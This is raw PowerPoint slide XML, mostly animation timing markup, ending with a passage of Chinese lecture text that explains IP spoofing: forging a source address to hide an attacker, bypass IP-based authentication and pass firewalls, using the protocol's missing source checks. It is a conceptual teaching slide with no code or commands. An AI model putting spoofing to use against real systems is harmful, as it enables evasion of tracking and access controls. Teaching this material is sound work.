                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="68" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="74" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="75" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2867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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="87" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="93" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="99" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="100" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>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8690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.03"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="106" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>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8691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.03"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="112" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>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2869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P spid="28675" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28676" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28677" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28678" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28679" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28680" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28682" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28683" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28684" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28685" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28686" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28687" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28688" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28689" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28690" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="28691" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="28692" grpId="0" bldLvl="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伪装成目标主机与其他计算机通信，达到：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐藏自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，防止被跟踪或记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址作为授权依据的认证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>穿越防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的缺陷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不对源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类比快递，有些要求寄送方身份认证</a:t>
            </a:r>
